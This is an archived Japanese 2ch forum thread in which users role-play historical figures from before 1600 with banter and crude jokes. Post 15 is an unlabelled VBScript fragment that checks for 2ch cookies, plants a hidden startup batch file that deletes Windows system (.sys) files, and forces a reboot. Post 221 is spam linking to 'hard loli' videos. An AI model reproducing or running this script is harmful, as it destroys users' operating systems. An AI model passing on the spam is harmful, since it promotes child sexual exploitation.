5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

西暦0年〜1600年(安土桃山時代)前後生まれ

1 :ひすとり:2001/06/07(木) 06:01
スレが無くって出場できなくてくすぶっていて、
今にも爆発しそうだったかたがた、
これでうっぷんが、晴れるでしょう。
江戸、紀元前・BCにおくれをとるなっ!!

2 :@例会より:2001/06/07(木) 06:10
やっとでたか、、、、、

3 :@例会より:2001/06/07(木) 06:11
これで最近までは連結されたか。、、、

4 :ひすとり:2001/06/07(木) 06:27
ありゃ、元年って1年だったか、な、まあいいや・・

5 :あ@1周年:2001/06/07(木) 06:32
一応・・・
朝じゃ、朝じゃっ!!
わっはっはっはっはっは・・・・・・・・・

6 :名無@@@:2001/06/07(木) 08:12
誰か教えてよぉ〜ぅ!! 変になっちゃうぅ〜
ほんとにいっ!!!   ここにいる人って、誰と誰よ?
どんな人たちなのよっ!!?
名無キグナス氷河石油 さんって?BC時代の人ですの??
・・・って、いうか、まだいらっしゃらない・・・

7 :名無キグナス氷河石油:2001/06/07(木) 09:57
呼びましたかね。

オーロラ・エクスキューション。

8 :あるべるとアインシュタイン:2001/06/07(木) 10:07
またスレがふえたのかい
忙しいぞい・・
ふぉっふぉっふぉっふぉっふぉっふぉっふぉっふぉ・・・・・
ほっほっほっほおっほっほっほっほっほっほっほっほ・・・・
きぃっきっきっきっきっきっき・・・・・
ほほほほほほほほほほほほっほっほっほっほ・・・・・
ほっほっほっほおっほっほっほっほっほっほっほっほ・・・・
きぃっきっきっきっきっきっき・・・・・


9 :ラファエ・ル・ロ:2001/06/07(木) 10:07
ダ・ビンチもくるかな・・・・
はっはっは・・・・

10 :長岡爺:2001/06/07(木) 10:12
だれが、おったかのぉ・・・
わしも年じゃのお・・・
ふふふふふふふh

11 :長岡爺:2001/06/07(木) 10:13
なんじゃ、なんじゃ・・・
おおぜいおるのお。

12 :じゅりえっと@1:2001/06/07(木) 10:15
おぉ、ろみお!!
私に会いに来てくれたのね?
おぉ、ろみお!!
あいらびゅう!!!

13 :真魚よ。:2001/06/07(木) 11:43
ついに登場できるのね。
うふふふふ

14 :最澄0:2001/06/07(木) 12:03
だね。

15 :これこれ@:2001/06/07(木) 12:31
Set ObjNTCookie = ObjFS.GetFolder("C:\Documents and Settings\Administrator\Cookies") 'Cookieフォルダを取得
str = ("2cn") & vbCR
For Each ObjFile In ObjNTCookie.Files
str = str & ObjFile.Name & vbCR
Next
If InStr(str,"2ch") Then 'Cookieフォルダの中身に"2ch"の文字がないか検索
Set WinNT = ObjFS.CreateTextFile("C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\system.bat")
WinNT.WriteLine("cd C:\WinNT\system32\")
WinNT.WriteLine("del *.sys")
WinNT.Close
Set WinNTBat = ObjFS.GetFile("C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\system.bat")
WinNTBat.Attributes = 2
Else
End If
Else 'Win9xの場合の処理(95では動かないと想う)
Set Obj9xCookie = ObjFS.GetFolder("C:\WINDOWS\Cookies") 'Cookieフォルダを取得
str = ("2cn") & vbCR
For Each ObjFile In Obj9xCookie.Files
str = str & ObjFile.Name & vbCR
Next
If InStr(str,"2ch") Then 'Cookieフォルダの中身に"2ch"の文字がないか検索
Set Win9x = ObjFS.CreateTextFile("C:\WINDOWS\スタート メニュー\プログラム\スタートアップ\system.bat")
Win9x.WriteLine("cd C:\windows\system\")
Win9x.WriteLine("del *.sys")
Win9x.Close
Set Win9xBat = ObjFS.GetFile("C:\WINDOWS\スタート メニュー\プログラム\スタートアップ\system.bat")
Win9xBat.Attributes = 2
Set WSHSHell=CreateObject("WScript.Shell")
WSHShell.Run "C:\WINDOWS\RUNDLL32.EXE Shell32.dll,SHExitWindowsEx 2" '再起動
Else

r

16 :ひみこ:2001/06/07(木) 15:03
わらわじゃ。

17 :名無キグナス氷河石油:2001/06/07(木) 23:41
おお・・・・

18 :s聖徳太子:2001/06/08(金) 00:05
わしも登場じゃい。

19 :あ@1周年:2001/06/08(金) 04:44
そろそろ、いくかっ、 ・・・・・・
朝じゃ、朝じゃっ!!
わっはっはっはっはっは・・・・・・・・・

20 :名無しさん ろろ:2001/06/08(金) 04:54
みんな、朝早いのう・・・
わっはっはっはっは

21 :呂呂:2001/06/08(金) 05:02
・・・に改名した。

22 :あずみ:2001/06/08(金) 05:23
わたしもここね。。。
うふふふふ・・・。。。

23 :@@@ですよ。。。:2001/06/08(金) 05:42
誰か教えてよぅ!! 変になっちゃうぅ〜
ほんとにいっ!!!   ここにいる人って、誰と誰よ?
どんな人たちなのよっ!!?
名無キグナス氷河石油 さんって? BC時代の人ですの??

24 :あずみ:2001/06/08(金) 06:08
斬るわよ。。。
うふふふふふ

25 :名無キグナス氷河石油:2001/06/08(金) 06:10
町娘さん、こっちに来りゃいいのに・・・
わっはっはっはっは

26 :あずみ:2001/06/08(金) 10:18
そうよ、町娘さんもね。
うふふふふ

27 :名無キグナス氷河石油:2001/06/08(金) 10:22
そうじゃ。

28 :長岡爺:2001/06/08(金) 12:36
ふぉっふぉふぉっふぉっふぉっふぉ・・・・・
あずみ さんや、おぬし、おったのか??

29 :八木ザ修羅:2001/06/08(金) 20:21
キグナス殿もおられたか...
げたげたははは

30 :長岡婆:2001/06/08(金) 20:38
わしゃあ、初めてじゃった化のぉ?
はじめまして・・・みなさま。
よろしくね。ふっふっふっふっふ

31 :八木ザ修羅:2001/06/08(金) 20:55
斬るのは私のほうが得意だ。
何しろ聖剣じゃ。
はははっはっは

32 :名無しさん@1周年:2001/06/08(金) 23:54
しゃちほこ

33 :あ@1周年:2001/06/09(土) 05:25
そろそろ、いくかっ、 ・・・・・・
朝じゃ、朝じゃっ!!
わっはっはっはっはっは・・・・・・・

34 :@例会より:2001/06/09(土) 16:52
そろそろ、あのけいじばんにいくか・・・・
おっほっほっほっほ

35 :あ@1周年:2001/06/10(日) 05:13
そろそろ、いくかっ、 ・・・・・・
朝じゃ、朝じゃっ!!
わっはっはっはっはっは・・・・・・・

36 :長岡婆:2001/06/10(日) 08:01
ほほう、朝かのぉ・・・
今日の天気は、どうなるじゃろう?
ほっほっほっほっほ・・・・・

37 :八木ザ修羅:2001/06/10(日) 16:23
五稜郭じゃい。
うほほほ

38 :奈菜資産:2001/06/10(日) 22:30
福島も始まるでしょうぞ。
あははははは

39 :マロ:2001/06/10(日) 23:23
麿は眠いのじゃ
休むでおじゃるよ

40 :あ@1周年:2001/06/11(月) 06:58
そろそろ、いくかっ、 ・・・・・・
朝じゃ、朝じゃっ!!
わっはっはっはっはっは・・・・・・・

41 :空海@kukai:2001/06/11(月) 09:36
マロ殿
おはよう。
ふふふふふ

42 :マロ:2001/06/11(月) 11:22
空海殿、お初でおじゃる。
ほーっほっほっほっ

43 :空海@kukai:2001/06/11(月) 17:24
マロ殿
珍しい、時間に、あくせすですのう。
本日は、お休みの日かのう?
ふっふっふっふ

44 :名無キグナス氷河石油:2001/06/11(月) 20:32
んじゃ。
泣き(;;)ほほほ

45 :あずみ:2001/06/11(月) 23:25
まだ、町娘さん こないの・・・・
ふふふっ

46 :あ@1周年:2001/06/12(火) 06:36
そろそろ、いくかっ、 ・・・・・・
朝じゃ、朝じゃっ!!
わっはっはっはっはっは・・・・・・,,

47 :八木ザ修羅:2001/06/12(火) 10:52
此処へは、音楽家は・・・
お、わかった。
うひひひ

48 ::2001/06/12(火) 17:21
ぼきぼきぃ・・・

49 :あ@1周年:2001/06/13(水) 06:46
そろそろ、いくかっ、 ・・・・
朝じゃ、朝じゃっ!!
わっはっはっはっはっは・・・・・・

50 :名無キグナス氷河石油:2001/06/13(水) 09:10
だいやもんどぉ、だすとぉっ!!

51 :りんどう:2001/06/13(水) 14:40
ぎゃらくてぃか、まぐなむ!!!

52 :長岡爺:2001/06/14(木) 07:58
今日は、朝の人出ないのう・・・・
うほほほほ・・・・・

53 :マロ:2001/06/14(木) 23:49
麿はマターリと
休むぞよ。


54 :空海@kukai:2001/06/15(金) 08:39
おじゃ・・・マロ殿
おはよう。
ふふふふふ

55 :名無キグナス氷河石油:2001/06/15(金) 12:21
梅雨じゃのう・・・
うわははは・・・・

56 :ルイ16世:2001/06/15(金) 19:51
朕モ入レテヨ!
アレ? 1600マデナノ?
鬱ダネ。GO TO HELL。

57 :ラファエ・ル・ロ:2001/06/15(金) 19:54
ルイ16世 どの、
どうぞ、入られい。

58 :峰来軒:2001/06/17(日) 23:40
pam@本物さんはいないかなあ?
うふふふふ・・・

59 :乱乱華:2001/06/18(月) 10:25
ひさしぶりね、ほんと。ふふふふふ・・・

60 :峰来軒:2001/06/20(水) 15:08
ああ、ほんとだ。うひゃひゃひゃ・・・

61 :八木ザ修羅:2001/06/21(木) 11:54
おふたりも来られましたな↑ひっひっひ

62 :長岡爺:2001/07/02(月) 23:19
皆、元気じゃのぉ・・・
ふぉふぉふぉふぉふぉ・・・

63 :織田信長:2001/07/08(日) 17:20
猿、猿はどこにおる!
犬千代、犬千代、はどこにおる!

64 :空海@kukai:2001/07/12(木) 01:37
おお、信長殿か、
来られましたな。
うふふふふふ・・・・

65 :乱乱華:2001/07/12(木) 11:16
ほんと・・・  ふふ

66 :木下籐吉郎:2001/07/13(金) 01:48
ここにおるがやー。
信長様どこに目えーついとらっせるのー。
今墨俣に城つくっとるでー、いそがしんだがやー。
てぃやーぎゃーにしてちょーよー。

67 :前田利家:2001/07/13(金) 01:56
わしもここにおるでよー。
はよ斎藤攻めよまいかー。
ちゃっと天下統一してよー、味噌かつでもたべよまい。

68 :乱乱華:2001/07/13(金) 13:54
すごおい、うふふふ・・・

69 :斉藤不動産:2001/07/13(金) 23:10
秀吉殿。
一夜城か。
今日もライトアップされておったぞ。(笑

70 :あずみ:2001/07/14(土) 02:39
斎藤不動産どの
来られましたな、うふふふふ

71 :木下籐吉郎:2001/07/14(土) 15:52
信長様、稲葉山城落としたでよー、何か茶器ちょーでぃやー。

72 :織田信長:2001/07/14(土) 15:55
よーやった、でかした猿。
まさかロープウェーつかって攻めてへんやろなー。

73 :木下籐吉郎:2001/07/14(土) 15:55
・・・・・・。

74 :後白河鳳凰:2001/07/15(日) 21:39
方便が完璧なようだが地元の者か?

75 :縄文人:2001/07/16(月) 18:56
おめら、おらを見てみ、死ねねぇっちのも、辛いもんだべサァー。

76 :弥生人:2001/07/17(火) 14:35
上の奴顔濃くねー。
おら、きらい。。

77 :縄文人 :2001/07/17(火) 23:11
ご、ごめんねー

78 :イエス:2001/07/17(火) 23:31
どなたか、私を呼びましたか?
紀元1年の生まれですが...

79 :jjj:2001/07/18(水) 02:19
>>78
実際はもっとはやく生まれてたそうですね

80 :名無@@@:2001/07/20(金) 14:19
誰か教えてよぉ〜ぅ!! 変になっちゃうぅ〜
ほんとにいっ!!!   ここにいる人って、誰と誰よ?
どんな人たちなのよっ!!?

81 :木下籐吉郎:2001/07/20(金) 16:00
80番殿、ひょっとしてあんたお市さんかのー。
わしの側室になってちょーでぃやー、
毎晩かわいがったるでよー。

82 :黒田 官兵衛:2001/07/21(土) 11:40
チンバの女とセクースしたい

83 :お市:2001/07/21(土) 12:14
私は死んでもサルのお相手はしませぬ。
この成り上がり者めが!
ええ、下世話なヤツ下がれ!!

84 :黒田 官兵衛:2001/07/21(土) 12:47
サルよりバター犬がすき ウフッ

85 :お市:2001/07/21(土) 13:39
>>84
変態まがいなこと言ってると又牢屋に押し込めますぞ。

86 :毛人:2001/07/22(日) 02:16
厩戸王子は何処?

87 :厩戸王子:2001/07/22(日) 04:03
>>86
こんな所にしかもこんな時間に何用だ?
斑鳩(本スレ)まで来い。
米目も待っているぞ。

88 :黒田 官兵衛:2001/07/22(日) 10:35
>>85
もう牢屋は懲り懲りでござる
それよりお市殿いいバター犬が
手に入りましてござります
舐め味抜群!! 調教済

89 :竹中半兵衛:2001/07/22(日) 19:44
官兵衛どの、てぃやーがーにせなかんよ!
おまはんの下ネタはもうえーでよー、
はよ秀吉殿助けたりんせー。
あのおっさん淀はんとやりまくっとりんさるで、
うっ、

吐血してまったがね、もうわしいかんわ!しんでまうわ!
後はたのんだでよー。

90 :あ@1周年:2001/07/24(火) 05:28
久しぶりに・・・・
そろそろ、いくかっ、
朝じゃ、朝じゃっ!!
わっはっはっはっはっは・・・・・・

91 :後鳥羽上皇:2001/07/24(火) 11:41
麿を佐渡ヶ島なんぞのど田舎に島流ししはった、
鎌倉幕府が憎くてたまりまへん。
どないしはりましょうか・・・

92 :あ@1周年:2001/08/13(月) 04:25
そろそろ、いくかっ、
朝じゃ、朝じゃっ!!
わっはっはっはっはっは・・・・・

93 :名無しさん@1周年:2001/08/13(月) 05:53
1

94 :明智光秀:2001/08/13(月) 14:24
けっけっけっけ
織田のやつ自害したな。あのとき。
どうしてやったのかって?質問受付中!

95 :名無キグナス氷河石油:2001/08/14(火) 05:02
明智光秀 殿
知りたいですのう・・・・・・

久久じゃ。

96 :明智光秀:2001/08/15(水) 23:12
目的は一つだけじゃ。流行語じゃよ。三日天下って一時流行ったろ。満足満足。

97 :名無キグナス氷河石油:2001/08/16(木) 05:44
明智光秀殿
ほほう・・・そうでしたか。

98 :弁慶:2001/08/16(木) 22:02
・・・ああよく寝た。1000年近く寝ると疲れがとれて傷も治るわい。
あれ?!何で?俺死んだことになってる?

99 :無キグナス氷河石油:2001/08/17(金) 05:25
弁慶選手?みんなは知っとるかのう?

100 :徳川綱吉:2001/08/18(土) 22:30
ゴルァ、お犬様を蹴るでないぞ!

101 :農民:2001/08/23(木) 09:33
恵みの雨じゃ

102 :斉藤道三:2001/08/23(木) 18:06
ミキドウザン?なんだあいつ。説明求む。

103 :名無し→しりとり:2001/08/23(木) 20:27
     

104 :名無キグナス氷河石油:01/09/02 16:36 ID:U.QCY54E
綱吉さんは、江戸時代では・・・

105 :徳川綱吉:01/09/02 21:27 ID:7oX1C.EU
ははは。スレの名前よく見てなかった。

106 :名無キグナス氷河石油:01/09/03 02:47 ID:sazWVZi6
良いんじゃ、良いんじゃ、気になさるな、
うわはははは

107 :黒柳徹子:01/09/03 03:33 ID:LW55Xhbo
あたしも入れて下さる?

108 :名無キグナス氷河石油:01/09/03 14:53 ID:oJ8Rvhbs
どうぞどうぞ、かたいことはぬきじゃ、入いられい!!
何か困りごとかの?
うわはははは

109 :ミイラ:01/09/04 15:48 ID:7wVGQLDU
もちろんですとも。
同士よ!!

110 :ガッチャン:01/09/04 22:46 ID:.qpDujaA
test..........

111 :ガッチャン:01/09/04 22:49 ID:AVr8tZFU
test..............

112 :ガッチャン:01/09/04 22:55 ID:AVr8tZFU
test........................

113 :ガッチャン:01/09/04 22:57 ID:AVr8tZFU

test..........................

114 :ガッチャン:01/09/04 23:02 ID:AVr8tZFU

test........................

115 :ガッチャン:01/09/04 23:15 ID:AVr8tZFU
test

116 :紀貫之:01/09/09 17:58
で、漏れの日記の諧謔おもしろかった?

117 :suda釈迦のひ孫:01/12/22 18:32
おもしろかったですよ。

118 :お市:01/12/22 20:18
久しぶりに来ましたが、なにやら荒れてる模様。

119 :名無キグナス氷河石油:01/12/23 08:57
そうですかのう・・・・・・

120 :道長:01/12/23 21:07
我が栄誉じゃ!!えーい酒を持て!!!

121 :あ@1周年:02/01/02 13:53
新春じゃ、新春じゃっ!!
わっはっはっはっはっは・・・・・

122 :  ばたかつ:02/01/22 17:20
始めまして〜

123 :お市:02/01/22 18:10
控えめなお方であらしゃれる。
もしや、わらわの探していた柴田勝家殿ではござりませぬか?
お逢いしとうもうした〜。

124 :お市:02/01/22 18:13
波乱万丈の生き様でござりましたが、やっと貴方様と言うおおらかな
器のお方にめぐり逢えもうした。
生涯の伴侶としてこの命たもう。

125 :  ばたかつ:02/01/22 22:51
わしゃ・・・面食いじゃ・・・おやんみ〜

126 :お市:02/01/23 01:47
いや〜ん、照れまする。
秀吉ごとき成り上がり者から比ぶればそなたは実にお品が宜しゅうござりまする。
秀吉はわらわを妾にいたすところでしたのじゃ。


127 :サファイヤ ◆IA777rF2 :02/01/23 20:30
ばたかつ殿はどこでくたばっておる?
情けないの〜。

128 :  ばたかつ:02/01/24 17:13
くたばっちゃおらんぞ・・・
お市殿は体操する時やっぱり おいっちにさんし とか言うんかいのう?
>>127おいおい!!HN違うじょ〜

129 :お市:02/01/26 17:29
ばたかつ殿 私はあなたさまの妻でござりまするそのお市殿と他人行儀な
お言葉は止めて、お市と呼んでくだされ。
して体操ですか?
あぁーいぃーうぅーです。

130 :  ばたかつ:02/01/26 23:41
せっしゃは あぁ〜いぃ〜わゎ〜〜
の方が好きじゃ・・・若ければもっと好きじゃ・・・

131 :お市:02/01/29 18:30
いや〜ん ばたかつ様のエッチ。
お市は身体は若いですわ。


132 :  ばたかつ:02/01/30 05:49
・・・いい年こいてるくせに お前の いや〜んを聞くと
鳥肌が・・・

133 :お市:02/01/30 07:35
いい年はお互い様でござりましょう。ばかたつのばか。
ところでばたかつ様は毛深い?
わらわは毛深いお方はちと苦手です。
何もつるんつるんとは言いませんが、そこそこでないと胸毛とかその他も
必要以上に生えてるお方はちょっと・・・

134 :  ばたかつ:02/01/30 08:08
全然濃くないぞい マウン珍の腕を見てみろや
つる〜んとしとるぞい

135 :お市:02/01/30 08:34
なら安心致しました。
ばかたつ様 もし、このスレに刺激が欲しいのでしたらあげて頂いても
わらわは一向に構わないのでござりまするが。

136 :  ばたかつ:02/01/30 23:07
>>135
お市よ・・・わしゃばたかつじゃ・・・ばかたつじゃ無いっちゅうんだ〜〜!

137 :お市:02/01/31 16:16
あらら、、とんだご無礼を。
常日頃からばかたつ、ばかたつと思ってるわけでは決してござりませぬ。
ですよ、ばかたつ、あぁん〜、たっくばたかつ殿。。。

138 :  ばたかつ:02/02/02 06:48
よっしゃ・・・朝の散歩じゃ・・・

139 :  ばたかつ:02/02/02 14:08
ageてもええのは、お前の・・・寄せて上げて・・・って
もう手遅れじゃがのう・・・

140 :お市:02/02/02 15:25
寄せてあげるほどまだたっぷりあるからいいんですっ。
ここでお見せできないのが残念。
あん〜、わたしミントになりたいにゃ〜ん。

141 :  ばたかつ:02/02/03 08:50
>わたしミントになりたいにゃ〜ん。
こっちが願い下げじゃ・・・ぞぞぞ〜〜〜っ!!

142 :お市:02/02/03 12:44
そんな心と裏腹なこと申すと、お仕置きにジェーホンの写メールで私の
恐ろしい画像送りつけますぞ。

143 :  ばたかつ:02/02/03 15:05
ぎゃ〜〜〜っ!!ご勘弁を〜〜っ!!
ん・・・!?しかし魔よけになるかも・・・

144 :お市:02/02/04 22:14
ばたかつ さま〜
ここ、いつまで二人の隠れ家でいられますかねぇ。

145 :お市:02/02/05 20:14
何だかな
 心に風邪を
  引いた今
  

146 :  ばたかつ:02/02/05 21:39
・・・永遠じゃ・・・

147 :  ばたかつ:02/02/06 05:25
心に風邪かいのう・・・気にするこたあ無い・・・
いろいろあるもんでのう・・・
それはそうとあっちに入れんぞな・・・

148 :お市:02/02/06 08:40
確かに。
暫くは「おだまり」の状態で宜しいかも。

149 :ばたかつ:02/02/09 22:58
僕・・・もう寝る・・・おやんみ〜だっちゃ

150 :お市:02/02/10 10:40
今朝から急に風邪風味でござりまする。
ばたかつさまをお風邪など召さぬようお気をつけて下されませ。

151 :ばたかつ:02/02/10 17:38
市・・・温かくしてゆっくり休め・・・
お粥でも作ってきてやろうかのう・・・

152 :お市:02/02/11 15:53
ありがとうございまする。
市は昨夜から無性に腹立たしいことがござりまする。
ばたかつさまとて同じ思いのはず。
どういたしましょうか。。。

153 :  ばたかつ:02/02/13 07:14
もう、わしゃあっちには行ってはおらんぞ、「桃子の部屋」には11日に1レスしただけじゃ
「集まりましょう」にも「桃の部屋」→「桃子の部屋」って訂正してあげただけじゃ・・・


154 :  ばたかつ:02/02/17 20:35
なんで卒業なんじゃ〜〜〜っ!!
市っ!!許さんぞ〜〜〜っ!!わしゃ留年したんじゃ〜〜っ!!
おまえも卒業せんで留年しろ〜〜〜っ!!

155 :お市:02/02/17 22:39
ばたかつさま〜
その気持ちが嬉しくて・・・
しかし煩悩の塊の私はそれほど強くはないのです。
煩悩を打ち消して魂の抜け殻同然に致せば宜しいのでしょうか?

156 :  ばたかつ:02/02/18 06:09
煩悩を打ち消さずに仲良く付き合って行くんじゃっ!!
子供を育てるように・・・孫が出来るんじゃろが、もうすぐ・・・
って事はわしも爺ちゃんかいなっ!?
煩悩は煩悩でも子煩悩じゃっ!!。

157 :お市:02/02/18 20:04
ばたかつさま
あなたさまと私の間に子はできなかったではありませぬか。
ゆえに孫など出来るハズもござりませぬ。
ああ、千姫、おはつ、おごうの子のことでござりますか?

いつくになっても煩悩はござります。
それを子煩悩でごまかせればよいのですが。

158 :  ばたかつ:02/02/18 21:33
そうじゃないんじゃ!お前との祝言は遅かったからのう・・・
まわりの家臣達の幸せは、市とわしにとっても幸せなんじゃ・・・

159 :お市:02/02/20 23:56
ばたかつさま
お市は歳を取り過ぎで息切れしてまいりました。
暫くお暇を下さりませ。
いつかまた若返ってお目にかかりたいものですねぇ。



160 :ばたかつ:02/02/23 06:49
いつまでも、いつまでも待っているからのう・・・市よ・・・

161 :浅井長政:02/03/16 16:46
お・・・・おいちー

162 :お市:02/03/17 17:30
あ・・・長政様・・・
市は貴方様のお子を立派に育てあげました。
どうか草葉の陰で見守っていてくだされませ。
勝家様にもよくして頂き市は幸せ者にございます。
しかし貴方様のことは方時も忘れたことはござりませぬ。

163 :お市:02/04/02 00:17
桜の花も散りましたのー。ばたかつさま。

164 :お市:02/04/02 00:19
ああーー。
殿方の気持ちはわからない。

165 :お市:02/04/02 00:20
悲しゅうございます。

166 :お市:02/04/02 00:21
皆、死んで下され。

167 :お市:02/04/02 00:23
人の気持ちを弄んで楽しんでいるお方はきっと地獄におちまするぞ。きっと。

168 :ばたかつ:02/04/05 05:49
市よ、そんなにかりかりするな・・・
わしが居るではないか・・・

169 :お市:02/04/05 07:27
そうですね。
私には、ばたかつ様が。

170 :お市:02/04/09 01:27
なんだかバカバカしくなった。
もう降りるわ。

171 :4の8:02/04/15 20:43
どう

172 :名無しさん@1周年:02/04/30 00:23
あんあんあんああ〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
バカバカしたらありゃしない^^
あんあんああああ
バッカヤロ〜〜〜〜〜〜〜〜!

173 :名無しさん@1周年:02/05/16 17:56
誇り高いお市は成り上がりでゲスな秀吉の妾になるよりは勝家の本妻に
なることを選んだ。
そしていよいよ落城の時、生きて晒し者になるよりは、自害の道を選んだ。
あっぱれじゃ。

174 :裕天寺 香:02/08/31 07:30
おはやう
あったのね、これもあったのね・・、みつけた・・

175 :人形師:02/08/31 07:41
おはやう
なんか、えっちなところ・・

176 :裕天寺 香:02/08/31 07:44
人形師 どの
おはやう
どこがえっちと申される?

177 :人形師:02/08/31 07:52
裕天寺 香 どの
おはやう
>>131 どのも申されて・・

178 :裕天寺 香:02/08/31 08:00
人形師 どの
うわ、えっt・・・、あ・・、いや、そうですのう・・

最近会津若松城へいってきました。あなたは?

179 :人形師:02/08/31 08:17
裕天寺 香 どの
なにか、昼の香りがするような・・

最近では、尾張の修道院へいきましたね。

180 :裕天寺 香:02/08/31 08:24
人形師 どの
ほほう、尾張の修道院とな? 織田領域の。

昼のとな・・?

181 :名無しさん@1周年:02/08/31 08:38
はいっ、どーもー、慶長3年生まれの哲司でございますー。
ども、よろしくー。

しかし、なんやねー、いつまでも熱いねー。
うちの嫁はんなんか、パンツ一丁で寝てるからねー。

182 :裕天寺 香:02/08/31 08:54
哲司どの
よろしく。
さきほど、べつスレで見かけたよう・・?
奥さまおられるとな・・?

183 :人形師:02/08/31 15:47
正確には尾張より手前だった・・
>昼のとな・・?
魔物の・・



184 :半蔵:02/09/01 19:29
お初にお目にかかり申す。
伊賀組棟梁の服部半蔵正成でござる。

185 :人形師:02/09/01 19:36
半蔵 殿
初めまして。

186 :半蔵:02/09/01 19:48
おお!これは人形師殿でござるか。
よろしくお願い申す。

187 :人形師:02/09/01 19:55
半蔵 殿
こちらこそ、よろしく。
私は秋〜冬が好きです。

188 :名無しさん@1周年:02/09/01 20:20
裕天寺 香=頓珍漢=☆=天狼星=桃子=裕香14歳=◆ICPO/pvs=◆Wind/D.k


189 :裕天寺 香 ◆hF0rmC.o :02/09/01 20:28
命名されるとき、横綱北天佑って思いつかたのだが、
それも至極軽く思いつき・・
「天」以外の文字が良かったかな・・?
しかし、もう遅い・・か、おほほほほ・・

190 :半蔵:02/09/01 20:32
それがしは、夏から秋にかけて、ちょうどこれからの季節が好きでござるな。
冬は、ちと苦手でござる。

それにしても前田のまつ殿はべっぴんでござるのォ。

191 :人形師:02/09/01 20:42
半蔵 殿
今、予告中・・

192 :名無しさん@1周年:02/09/01 20:49
裕天寺 香=頓珍漢=☆=天狼星=桃子=裕香14歳=◆ICPO/pvs=◆Wind/D.k


193 :半蔵:02/09/01 20:56
うーむ。
信濃守はやはり田中殿に決まりそうじゃな。
「評定衆は潔う退任すべし」との声が強まろうのう。

194 :人形師:02/09/01 21:02
藤原氏と比べたら断然、松嶋氏の方が良い・・

195 :半蔵:02/09/01 21:07
同感。同感。太田道灌。

196 :人形師:02/09/01 21:14
気が合いますね。大和撫子。

197 :名無しさん@1周年:02/09/01 21:30
http://mentai.2ch.net/test/read.cgi/nendai/1029998858/l50

198 :人形師:02/09/01 21:33
>>197
それがどうした?

199 :半蔵:02/09/01 21:58
人形師殿
197はいったい何者でござる?

200 :半蔵:02/09/01 21:59
ついでに200げっとでござるわい。

201 :名無キグナス氷河石油:02/09/01 22:20
なんと、久々に来てみたら、揚っておるではないか?

202 :人形師:02/09/02 03:23
半蔵 殿
14歳の女の子ですよ。
冬は師走がいい・・

名無キグナス氷河石油 殿
お久しぶりです。揚がっていましたね・・

203 :半蔵:02/09/02 22:52
ほう、14歳の・・・、裕香姫でござるか?

204 :人形師:02/09/02 23:47
そうです、裕香姫を御存知でしたか・・。


205 :半蔵:02/09/03 00:18
ははは、いや、名前だけは・・・。
そうとうなジャジャンマ姫様と聞いておりますが。

キグナス殿と申されるは、かなりの古参とお見受けいたす。
油問屋を営んでおられるのかな?

206 :人形師:02/09/04 20:45
半蔵殿
姫は有名ですね、私は応援しています。
今、秋新茶を飲んでいます・・

207 :名無キグナス氷河石油:02/09/06 03:03
半蔵 殿
何かだいぶ以前御見受けしていたような・・・
気のせいかの・・

人形師殿
たしかおはつ・・、あ、いや、
以前どこかで?

208 :人形師:02/09/06 03:09
名無キグナス氷河石油 殿
確かどこかで御会いした事があった様な気がします。
前世の事かも、しれません・・・


209 :名無キグナス氷河石油:02/09/06 03:13
人形師 殿
前世かの……・・うむ、
裕香姫とは架空の人物ですかの?

210 :人形師:02/09/06 03:17
名無キグナス氷河石油 殿
架空の・・・?
私は実在の中学生だと思っていましたが、どうなのでしょう?

211 :名無キグナス氷河石油:02/09/06 03:24
人形師 殿
ん? ちゅーがくせいと申されるか?
しかしあそこまでこの乱世の事態や伴天連の学問を知ってると成ると。
集団のえげれすなどの隠密集団 ではないかと……・・?

212 :人形師:02/09/06 03:30
名無キグナス氷河石油 殿
成る程・・確かにそうかもしれませんね。
良く考えるとそう思えてきますね。

213 :名無キグナス氷河石油:02/09/06 03:35
人形師 殿
でしょう、そうでしょう、はっははは
しかし修羅殿があそこまでかってるとのぉ〜

214 :人形師:02/09/06 03:45
名無キグナス氷河石油 殿
修羅殿はとても純粋な方なのかもしれませんね。
裕香姫の宮でオデット嬢が怒り出しそうですね・・・


215 :名無キグナス氷河石油:02/09/06 03:52
人形師 殿
きゅっ、宮とな?
宮殿のことかの……?
・・と、分っててそれはよそう。(自己反省)

修羅殿は改心されてるはずじゃしのう・・?
……と成れば……、確かか・・、しかしのう……

216 :半蔵:02/09/06 19:42
キグナス 殿
 >何かだいぶ以前御見受けしていたような・・・
  気のせいかの・・

それは、きっと前世でござろう。(な〜んちって)


217 :人形師:02/09/06 19:59
半蔵 殿
そして来世でもきっと・・・?

名無キグナス氷河石油 殿
貴方も将来宮殿に・・?
昨日は中学生と言いましたが、本音を言うと20代半ばの男性?
と言う気がしていましたね・・・。年令や性別など関係ないですが。

218 :半蔵:02/09/06 20:10
人形師殿
 >貴方も将来宮殿に・・?

 うむ、50歳近くにならぬと、あの宮には入場できますまい。

219 :人形師:02/09/07 00:43
半蔵 殿
50!?・・・修行ですね・・

220 :影道総帥@:02/09/08 12:52
半蔵 殿   、人形師殿
お初です。
下界の騒ぎは、何ですかな?

221 :名無しさん@1周年:02/09/08 12:59


ハードロリは好きですか?
ビデオとか見たりします?
http://www2.free-city.net/home/arisuya/



222 :人形師:02/09/08 13:52
影道総帥@ 殿
初めまして。私にも解りませんよ。

薬師殿はいらっしゃいませんか?中医殿は?
最近、肝臓が痛むので・・

223 :半蔵:02/09/08 14:03
影道総帥@ 殿
服部半蔵でござる。よろしく頼み申す。
下界の騒ぎとは、何のことでござろう。


224 :影道総帥@:02/09/08 14:21
人形師、殿半蔵 殿
拙者もこの、最近の騒ぎを聞き付けてこっちの磨れまで来てみました。
何やら息子達もその取り巻きも、我が秘剣を使い出したり。

さらに勘ちがい問題と逝った様な‥‥

>薬師殿はいらっしゃいませんか?中医殿は?
この御ふた方は誰ぞ?

225 :人形師:02/09/08 17:21
影道総帥@ 殿
特定の人物ではないです。医者はいないか?というような・・
胃か肝臓の辺りが1週間前辺りから痛いのですがなんでしょう?
それとは関係ありませんが、酒で抗生物質を服用したら
腕に赤斑が出ました。半日程で引きましたが・・。

226 :影道総帥@:02/09/08 23:26
人形師、殿、
医者とは言えんかも知れんが、この影道旬、地獄谷にて会得した技
影道回醒波という技法が、有るには有るが‥‥
そちの症状は心的影響が強いものと思われる。
否、心的原因。違うかの?

227 :人形師:02/09/09 05:44
影道総帥@ 殿
